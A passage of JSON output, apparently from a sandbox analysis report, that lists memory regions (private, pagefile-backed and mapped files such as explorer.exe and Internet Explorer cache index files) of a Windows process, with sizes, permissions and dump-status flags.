"region_1102", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_1103", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1104", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1105", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_1106", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3899391, "entry_point": 0, "filename": null, "id": "region_1107", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 135168, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_1108", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1109", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4263935, "entry_point": 0, "filename": null, "id": "region_1110", "name": "pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4333567, "entry_point": 0, "filename": null, "id": "region_1111", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4399103, "entry_point": 0, "filename": null, "id": "region_1112", "name": "pagefile_0x0000000000430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4390912, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4460543, "entry_point": 0, "filename": null, "id": "region_1113", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4526079, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_1115", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_1116", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_1117", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 7729151, "entry_point": 0, "filename": null, "id": "region_1118", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7995391, "entry_point": 0, "filename": null, "id": "region_1119", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 8003583, "entry_point": 0, "filename": null, "id": "region_1120", "name": "pagefile_0x00000000007a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7995392, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 8069119, "entry_point": 0, "filename": null, "id": "region_1121", "name": "pagefile_0x00000000007b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8060928, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x00000000007c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8126464, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 8454143, "entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 8466431, "entry_point": 8454144, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui", "id": "region_1124", "name": "comctl32.dll.mui", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui", "region_type": "memory_mapped_file", "start_va": 8454144, "timestamp": "00:01:06.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 8523775, "entry_point": 0, "filename": null, "id": "region_1125", "name": "private_0x0000000000820000", "norm_filename": null, "region_type": "private_memory", "start_va": 8519680, "timestamp": "00:01:06.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 172032, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8757247, "entry_point": 0, "filename": null, "id": "region_1126", "name": "private_0x0000000000830000", "norm_filename": null, "region_type": "private_memory", "start_va": 8585216, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 8818687, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 8880127, "entry_point": 0, "filename": null, "id": "region_1128", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 8916991, "entry_point": 0, "filename": null, "id": "region_1129", "name": "pagefile_0x0000000000880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8912896, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8994815, "entry_point": 8978432, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1130", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 8978432, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 540672, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9584639, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:01:06.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2625536, "start_va": 9633792, "type": "region", "version": 1 }, "end_va": 12259327, "entry_point": 9633792, "filename": "\\Windows\\explorer.exe", "id": "region_1132", "name": "explorer.exe", "norm_filename": "c:\\windows\\explorer.exe", "region_type": "memory_mapped_file", "start_va": 9633792, "timestamp": "00:01:06.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 24903679, "entry_point": 0, "filename": null, "id": "region_1133", "name": "pagefile_0x0000000000bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12320768, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 29044735, "entry_point": 0, "filename": null, "id": "region_1134", "name": "pagefile_0x00000000017c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 24903680, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 32043007, "entry_point": 29097984, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1135", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29097984, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 442368, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32489471, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33705983, "entry_point": 33554432, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_1138", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 33767423, "entry_point": 33751040, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1139", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 33751040, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 33824767, "entry_point": 0, "filename": null, "id": "region_1140", "name": "pagefile_0x0000000002040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33816576, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 33947647, "entry_point": 0, "filename": null, "id": "region_1141", "name": "private_0x0000000002050000", "norm_filename": null, "region_type": "private_memory", "start_va": 33882112, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33947648, "type": "region", "version": 1 }, "end_va": 34471935, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x0000000002060000", "norm_filename": null, "region_type": "private_memory", "start_va": 33947648, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 34668543, "entry_point": 34471936, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_1143", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34676735, "entry_point": 0, "filename": null, "id": "region_1144", "name": "pagefile_0x0000000002110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34668544, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34996223, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x0000000002120000", "norm_filename": null, "region_type": "private_memory", "start_va": 34734080, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35000319, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35078143, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 35143679, "entry_point": 0, "filename": null, "id": "region_1148", "name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 35192832, "type": "region", "version": 1 }, "end_va": 35201023, "entry_point": 0, "filename": null, "id": "region_1149", "name": "pagefile_0x0000000002190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35192832, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 35262463, "entry_point": 0, "filename": null, "id": "region_1150", "name": "private_0x00000000021a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35258368, "timestamp": "00:01:06.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35323904, "type": "region", "version": 1 }, "end_va": 35327999, "entry_point": 0, "filename": null, "id": "region_1151", "name": "private_0x00000000021b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35323904, "timestamp": "00:01:06.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35405823, "entry_point": 0, "filename": null, "id": "region_1152", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35459071, "entry_point": 0, "filename": null, "id": "region_1153", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35524607, "entry_point": 0, "filename": null, "id": "region_1154", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35586048, "type": "region", "version": 1 }, "end_va": 35590143, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x00000000021f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35586048, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 35655679, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35721215, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x0000000002210000", "norm_filename": null, "region_type": "private_memory", "start_va": 35717120, "timestamp": "00:01:06.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 35782656, "type": "region", "version": 1 }, "end_va": 35848191, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000002220000", "norm_filename": null, "region_type": "private_memory", "start_va": 35782656, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35921919, "entry_point": 0, "filename": null, "id": "region_1159", "name": "pagefile_0x0000000002240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35913728, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36032511, "entry_point": 35979264, "filename": "\\Windows\\System32\\en-US\\wininet.dll.mui", "id": "region_1160", "name": "wininet.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\wininet.dll.mui", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36077567, "entry_point": 36044800, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1161", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 36044800, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36126719, "entry_point": 36110336, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Cookies\\index.dat", "id": "region_1162", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 36110336, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 36241407, "entry_point": 36175872, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat", "id": "region_1163", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 36175872, "timestamp": "00:01:06.767", "type": 